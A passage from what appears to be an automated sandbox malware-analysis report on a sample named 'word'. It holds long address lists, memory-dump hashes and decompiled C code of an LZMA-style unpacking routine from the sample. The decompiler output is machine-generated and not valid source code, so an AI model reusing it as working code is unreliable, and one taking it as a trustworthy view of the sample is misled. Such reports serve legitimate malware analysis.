									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                    0x00000000
                                    0x00406ffe
                                    0x00406ffe
                                    0x00407002
                                    0x00407023
                                    0x0040702a
                                    0x00407030
                                    0x00407036
                                    0x00407048
                                    0x0040704e
                                    0x00407053
                                    0x00000000
                                    0x00407004
                                    0x0040700a
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x004073ce
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x0040741c
                                    0x00407420
                                    0x004075cf
                                    0x004075e5
                                    0x004075ed
                                    0x004075f4
                                    0x004075f6
                                    0x004075fd
                                    0x00407601
                                    0x00407601
                                    0x0040742c
                                    0x00407433
                                    0x0040743b
                                    0x0040743e
                                    0x00407441
                                    0x00407441
                                    0x00407447
                                    0x00407447
                                    0x00406be3
                                    0x00406be3
                                    0x00406be3
                                    0x00406bec
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x00000000
                                    0x00406bfd
                                    0x00000000
                                    0x00000000
                                    0x00406c06
                                    0x00406c09
                                    0x00406c0c
                                    0x00406c10
                                    0x00000000
                                    0x00000000
                                    0x00406c16
                                    0x00406c19
                                    0x00406c1b
                                    0x00406c1c
                                    0x00406c1f
                                    0x00406c21
                                    0x00406c22
                                    0x00406c24
                                    0x00406c27
                                    0x00406c2c
                                    0x00406c31
                                    0x00406c3a
                                    0x00406c4d
                                    0x00406c50
                                    0x00406c5c
                                    0x00406c84
                                    0x00406c86
                                    0x00406c94
                                    0x00406c94
                                    0x00406c98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406c88
                                    0x00406c88
                                    0x00406c8b
                                    0x00406c8c
                                    0x00406c8c
                                    0x00000000
                                    0x00406c88
                                    0x00406c62
                                    0x00406c67
                                    0x00406c67
                                    0x00406c70
                                    0x00406c78
                                    0x00406c7b
                                    0x00000000
                                    0x00406c81
                                    0x00406c81
                                    0x00000000
                                    0x00406c81
                                    0x00000000
                                    0x00406c9e
                                    0x00406c9e
                                    0x00406ca2
                                    0x0040754e
                                    0x00000000
                                    0x0040754e
                                    0x00406cab
                                    0x00406cbb
                                    0x00406cbe
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc4
                                    0x00406cc8
                                    0x00000000
                                    0x00000000
                                    0x00406cca
                                    0x00406cd0
                                    0x00406cfa
                                    0x00406d00
                                    0x00406d07
                                    0x00000000
                                    0x00406d07
                                    0x00406cd6
                                    0x00406cd9
                                    0x00406cde
                                    0x00406cde
                                    0x00406ce9
                                    0x00406cf1
                                    0x00406cf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d39
                                    0x00406d3f
                                    0x00406d42
                                    0x00406d4f
                                    0x00406d57
                                    0x00000000
                                    0x00000000
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d12
                                    0x0040755d
                                    0x00000000
                                    0x0040755d
                                    0x00406d1e
                                    0x00406d29
                                    0x00406d29
                                    0x00406d29
                                    0x00406d2c
                                    0x00406d2f
                                    0x00406d32
                                    0x00406d37
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d5f
                                    0x00406d61
                                    0x00406d64
                                    0x00406dd5
                                    0x00406dd8
                                    0x00406ddb
                                    0x00406de2
                                    0x00406dec
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x00406d66
                                    0x00406d6a
                                    0x00406d6d
                                    0x00406d6f
                                    0x00406d72
                                    0x00406d75
                                    0x00406d77
                                    0x00406d7a
                                    0x00406d7c
                                    0x00406d81
                                    0x00406d84
                                    0x00406d87
                                    0x00406d8b
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9c
                                    0x00406da0
                                    0x00406da8
                                    0x00406da8
                                    0x00406da8
                                    0x00406da2
                                    0x00406da2
                                    0x00406da2
                                    0x00406d97
                                    0x00406d97
                                    0x00406d97
                                    0x00406dac
                                    0x00406daf
                                    0x00406dcd
                                    0x00406dcf
                                    0x00000000
                                    0x00406db1
                                    0x00406db1
                                    0x00406db4
                                    0x00406db7
                                    0x00406dba
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbf
                                    0x00406dc2
                                    0x00406dc4
                                    0x00406dc5
                                    0x00406dc8
                                    0x00000000
                                    0x00406dc8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00407068
                                    0x0040706c
                                    0x0040708f
                                    0x00407092
                                    0x00407095
                                    0x0040709f
                                    0x0040706e
                                    0x0040706e
                                    0x00407071
                                    0x00407074
                                    0x00407077
                                    0x00407084
                                    0x00407087
                                    0x00407087
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x00000000
                                    0x004070ab
                                    0x004070af
                                    0x00000000
                                    0x00000000
                                    0x004070b5
                                    0x004070b9
                                    0x00000000
                                    0x00000000
                                    0x004070bf
                                    0x004070c1
                                    0x004070c5
                                    0x004070c5
                                    0x004070c8
                                    0x004070cc
                                    0x00000000
                                    0x00000000
                                    0x0040711c
                                    0x00407120
                                    0x00407127
                                    0x0040712a
                                    0x0040712d
                                    0x00407137
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x004073cb
                                    0x00407122
                                    0x00000000
                                    0x00000000
                                    0x00407143
                                    0x00407147
                                    0x0040714e
                                    0x00407151
                                    0x00407154
                                    0x00407149
                                    0x00407149
                                    0x00407149
                                    0x00407157
                                    0x0040715a
                                    0x0040715d
                                    0x0040715d
                                    0x00407160
                                    0x00407163
                                    0x00407166
                                    0x00407166
                                    0x00407169
                                    0x00407170
                                    0x00407175
                                    0x00000000
                                    0x00000000
                                    0x00407203
                                    0x00407203
                                    0x00407207
                                    0x004075a5
                                    0x00000000
                                    0x004075a5
                                    0x0040720d
                                    0x00407210
                                    0x00407213
                                    0x00407217
                                    0x0040721a
                                    0x00407220
                                    0x00407222
                                    0x00407222
                                    0x00407222
                                    0x00407225
                                    0x00407228
                                    0x00000000
                                    0x00000000
                                    0x00406df8
                                    0x00406df8
                                    0x00406dfc
                                    0x00407569
                                    0x00000000
                                    0x00407569
                                    0x00406e02
                                    0x00406e05
                                    0x00406e08
                                    0x00406e0c
                                    0x00406e0f
                                    0x00406e15
                                    0x00406e17
                                    0x00406e17
                                    0x00406e17
                                    0x00406e1a
                                    0x00406e1d
                                    0x00406e1d
                                    0x00406e20
                                    0x00406e23
                                    0x00000000
                                    0x00000000
                                    0x00406e29
                                    0x00406e2f
                                    0x00000000
                                    0x00000000
                                    0x00406e35
                                    0x00406e35
                                    0x00406e39
                                    0x00406e3c
                                    0x00406e3f
                                    0x00406e42
                                    0x00406e45
                                    0x00406e46
                                    0x00406e49
                                    0x00406e4b
                                    0x00406e51
                                    0x00406e54
                                    0x00406e57
                                    0x00406e5a
                                    0x00406e5d
                                    0x00406e60
                                    0x00406e63
                                    0x00406e7f
                                    0x00406e82
                                    0x00406e85
                                    0x00406e88
                                    0x00406e8f
                                    0x00406e93
                                    0x00406e95
                                    0x00406e99
                                    0x00406e65
                                    0x00406e65
                                    0x00406e69
                                    0x00406e71
                                    0x00406e76
                                    0x00406e78
                                    0x00406e7a
                                    0x00406e7a
                                    0x00406e9c
                                    0x00406ea3
                                    0x00406ea6
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eb1
                                    0x00406eb1
                                    0x00406eb5
                                    0x00407575
                                    0x00000000
                                    0x00407575
                                    0x00406ebb
                                    0x00406ebe
                                    0x00406ec1
                                    0x00406ec5
                                    0x00406ec8
                                    0x00406ece
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed3
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406edc
                                    0x00000000
                                    0x00000000
                                    0x00406ede
                                    0x00406ee1
                                    0x00406ee4
                                    0x00406ee7
                                    0x00406eea
                                    0x00406eed
                                    0x00406ef0
                                    0x00406ef3
                                    0x00406ef6
                                    0x00406ef9
                                    0x00406efc
                                    0x00406f14
                                    0x00406f17
                                    0x00406f1a
                                    0x00406f1d
                                    0x00406f1d
                                    0x00406f20
                                    0x00406f24
                                    0x00406f26
                                    0x00406efe
                                    0x00406efe
                                    0x00406f06
                                    0x00406f0b
                                    0x00406f0d
                                    0x00406f0f
                                    0x00406f0f
                                    0x00406f29
                                    0x00406f30
                                    0x00406f33
                                    0x00000000
                                    0x00406f35
                                    0x00000000
                                    0x00406f35
                                    0x00406f33
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00000000
                                    0x00000000
                                    0x00406f75
                                    0x00406f75
                                    0x00406f79
                                    0x00407581
                                    0x00000000
                                    0x00407581
                                    0x00406f7f
                                    0x00406f82
                                    0x00406f85
                                    0x00406f89
                                    0x00406f8c
                                    0x00406f92
                                    0x00406f94
                                    0x00406f94
                                    0x00406f94
                                    0x00406f97
                                    0x00406f9a
                                    0x00406f9a
                                    0x00406fa0
                                    0x00406f3e
                                    0x00406f3e
                                    0x00406f41
                                    0x00000000
                                    0x00406f41
                                    0x00406fa2
                                    0x00406fa2
                                    0x00406fa5
                                    0x00406fa8
                                    0x00406fab
                                    0x00406fae
                                    0x00406fb1
                                    0x00406fb4
                                    0x00406fb7
                                    0x00406fba
                                    0x00406fbd
                                    0x00406fc0
                                    0x00406fd8
                                    0x00406fdb
                                    0x00406fde
                                    0x00406fe1
                                    0x00406fe1
                                    0x00406fe4
                                    0x00406fe8
                                    0x00406fea
                                    0x00406fc2
                                    0x00406fc2
                                    0x00406fca
                                    0x00406fcf
                                    0x00406fd1
                                    0x00406fd3
                                    0x00406fd3
                                    0x00406fed
                                    0x00406ff4
                                    0x00406ff7
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00407286
                                    0x00407286
                                    0x0040728a
                                    0x004075b1
                                    0x00000000
                                    0x004075b1
                                    0x00407290
                                    0x00407293
                                    0x00407296
                                    0x0040729a
                                    0x0040729d
                                    0x004072a3
                                    0x004072a5
                                    0x004072a5
                                    0x004072a5
                                    0x004072a8
                                    0x00000000
                                    0x00000000
                                    0x00407056
                                    0x00407056
                                    0x00407059
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x00000000
                                    0x00407395
                                    0x00407399
                                    0x004073bb
                                    0x004073be
                                    0x004073c8
                                    0x004073cb
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x004073cb
                                    0x0040739b
                                    0x0040739e
                                    0x004073a2
                                    0x004073a5
                                    0x004073a5
                                    0x004073a8
                                    0x00000000
                                    0x00000000
                                    0x00407452
                                    0x00407456
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x0040747b
                                    0x00407482
                                    0x00407489
                                    0x00407489
                                    0x00000000
                                    0x00407489
                                    0x00407458
                                    0x0040745b
                                    0x0040745e
                                    0x00407461
                                    0x00407468
                                    0x004073ac
                                    0x004073ac
                                    0x004073af
                                    0x00000000
                                    0x00000000
                                    0x00407543
                                    0x00407546
                                    0x00407447
                                    0x00000000
                                    0x00000000
                                    0x0040717d
                                    0x0040717f
                                    0x00407186
                                    0x00407187
                                    0x00407189
                                    0x0040718c
                                    0x00000000
                                    0x00000000
                                    0x00407194
                                    0x00407197
                                    0x0040719a
                                    0x0040719c
                                    0x0040719e
                                    0x0040719e
                                    0x0040719f
                                    0x004071a2
                                    0x004071a9
                                    0x004071ac
                                    0x004071ba
                                    0x00000000
                                    0x00000000
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x00000000
                                    0x00000000
                                    0x0040749f
                                    0x0040749f
                                    0x004074a3
                                    0x004075db
                                    0x00000000
                                    0x004075db
                                    0x004074a9
                                    0x004074ac
                                    0x004074af
                                    0x004074b3
                                    0x004074b6
                                    0x004074bc
                                    0x004074be
                                    0x004074be
                                    0x004074be
                                    0x004074c1
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c7
                                    0x004074c7
                                    0x004074cb
                                    0x0040752b
                                    0x0040752e
                                    0x00407533
                                    0x00407534
                                    0x00407536
                                    0x00407538
                                    0x0040753b
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x0040744d
                                    0x00407447
                                    0x004074cd
                                    0x004074d3
                                    0x004074d6
                                    0x004074d9
                                    0x004074dc
                                    0x004074df
                                    0x004074e2
                                    0x004074e5
                                    0x004074e8
                                    0x004074eb
                                    0x004074ee
                                    0x00407507
                                    0x0040750a
                                    0x0040750d
                                    0x00407510
                                    0x00407514
                                    0x00407516
                                    0x00407516
                                    0x00407517
                                    0x0040751a
                                    0x004074f0
                                    0x004074f0
                                    0x004074f8
                                    0x004074fd
                                    0x004074ff
                                    0x00407502
                                    0x00407502
                                    0x0040751d
                                    0x00407524
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x004071c2
                                    0x004071c5
                                    0x004071fb
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732e
                                    0x0040732e
                                    0x00407331
                                    0x00407333
                                    0x004075bd
                                    0x00000000
                                    0x004075bd
                                    0x00407339
                                    0x0040733c
                                    0x00000000
                                    0x00000000
                                    0x00407342
                                    0x00407346
                                    0x00407349
                                    0x00407349
                                    0x00407349
                                    0x00000000
                                    0x00407349
                                    0x004071c7
                                    0x004071c9
                                    0x004071cb
                                    0x004071cd
                                    0x004071d0
                                    0x004071d1
                                    0x004071d3
                                    0x004071d5
                                    0x004071d8
                                    0x004071db
                                    0x004071f1
                                    0x004071f6
                                    0x0040722e
                                    0x0040722e
                                    0x00407232
                                    0x0040725e
                                    0x00407260
                                    0x00407267
                                    0x0040726a
                                    0x0040726d
                                    0x0040726d
                                    0x00407272
                                    0x00407272
                                    0x00407274
                                    0x00407277
                                    0x0040727e
                                    0x00407281
                                    0x004072ae
                                    0x004072ae
                                    0x004072b1
                                    0x004072b4
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00000000
                                    0x00407328
                                    0x004072b6
                                    0x004072bc
                                    0x004072bf
                                    0x004072c2
                                    0x004072c5
                                    0x004072c8
                                    0x004072cb
                                    0x004072ce
                                    0x004072d1
                                    0x004072d4
                                    0x004072d7
                                    0x004072f0
                                    0x004072f2
                                    0x004072f5
                                    0x004072f6
                                    0x004072f9
                                    0x004072fb
                                    0x004072fe
                                    0x00407300
                                    0x00407302
                                    0x00407305
                                    0x00407307
                                    0x0040730a
                                    0x0040730e
                                    0x00407310
                                    0x00407310
                                    0x00407311
                                    0x00407314
                                    0x00407317
                                    0x004072d9
                                    0x004072d9
                                    0x004072e1
                                    0x004072e6
                                    0x004072e8
                                    0x004072eb
                                    0x004072eb
                                    0x0040731a
                                    0x00407321
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x00000000
                                    0x00407323
                                    0x00000000
                                    0x00407323
                                    0x00407321
                                    0x00407234
                                    0x00407237
                                    0x00407239
                                    0x0040723c
                                    0x0040723f
                                    0x00407242
                                    0x00407244
                                    0x00407247
                                    0x0040724a
                                    0x0040724a
                                    0x0040724d
                                    0x0040724d
                                    0x00407250
                                    0x00407257
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x00000000
                                    0x00407259
                                    0x00000000
                                    0x00407259
                                    0x00407257
                                    0x004071dd
                                    0x004071e0
                                    0x004071e2
                                    0x004071e5
                                    0x00000000
                                    0x00000000
                                    0x00406f44
                                    0x00406f44
                                    0x00406f48
                                    0x0040758d
                                    0x00000000
                                    0x0040758d
                                    0x00406f4e
                                    0x00406f51
                                    0x00406f54
                                    0x00406f57
                                    0x00406f5a
                                    0x00406f5d
                                    0x00406f60
                                    0x00406f62
                                    0x00406f65
                                    0x00406f68
                                    0x00406f6b
                                    0x00406f6d
                                    0x00406f6d
                                    0x00406f6d
                                    0x00000000
                                    0x00000000
                                    0x004070cf
                                    0x004070cf
                                    0x004070d3
                                    0x00407599
                                    0x00000000
                                    0x00407599
                                    0x004070d9
                                    0x004070dc
                                    0x004070df
                                    0x004070e2
                                    0x004070e4
                                    0x004070e4
                                    0x004070e4
                                    0x004070e7
                                    0x004070ea
                                    0x004070ed
                                    0x004070f0
                                    0x004070f3
                                    0x004070f6
                                    0x004070f7
                                    0x004070f9
                                    0x004070f9
                                    0x004070f9
                                    0x004070fc
                                    0x004070ff
                                    0x00407102
                                    0x00407105
                                    0x00407105
                                    0x00407105
                                    0x00407108
                                    0x0040710a
                                    0x0040710a
                                    0x00000000
                                    0x00000000
                                    0x0040734c
                                    0x0040734c
                                    0x0040734c
                                    0x00407350
                                    0x00000000
                                    0x00000000
                                    0x00407356
                                    0x00407359
                                    0x0040735c
                                    0x0040735f
                                    0x00407361
                                    0x00407361
                                    0x00407361
                                    0x00407364
                                    0x00407367
                                    0x0040736a
                                    0x0040736d
                                    0x00407370
                                    0x00407373
                                    0x00407374
                                    0x00407376
                                    0x00407376
                                    0x00407376
                                    0x00407379
                                    0x0040737c
                                    0x0040737f
                                    0x00407382
                                    0x00407385
                                    0x00407389
                                    0x0040738b
                                    0x0040738e
                                    0x00000000
                                    0x00407390
                                    0x0040710d
                                    0x0040710d
                                    0x00000000
                                    0x0040710d
                                    0x0040738e
                                    0x004075c3
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x004075fa
                                    0x004075fa
                                    0x00000000
                                    0x004075fa
                                    0x00407447
                                    0x004073ce
                                    0x004073cb
                                    0x00000000
                                    0x00407002

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                    • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                    • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                    • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 98%
                                    			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
